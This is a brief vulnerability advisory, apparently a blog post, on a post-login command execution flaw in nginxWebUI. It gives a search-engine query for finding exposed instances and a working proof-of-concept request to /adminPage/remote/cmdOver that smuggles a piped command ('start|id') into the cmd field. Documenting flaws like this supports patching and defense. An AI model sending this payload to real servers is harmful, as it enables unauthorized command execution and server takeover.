Nginxwebui Cmdover Background Command Execution Vulnerability
Nginxwebui Cmdover Background Command Execution Vulnerability
nginxWebUI cmdOver background command execution vulnerability
Vulnerability Description
There is a command execution vulnerability in the nginxWebUI background. After the attacker logs into the background, he can execute any command to obtain server permissions.
Vulnerability Impact
nginxWebUI
Network surveying and mapping
title=”nginxwebui”
Vulnerability reappears
Login page
Verify the request package
1
2
3
POST /adminPage/remote/cmdOver
remoteId=local&cmd=start|id&interval=1
This post is licensed under CC BY 4.0 by the author.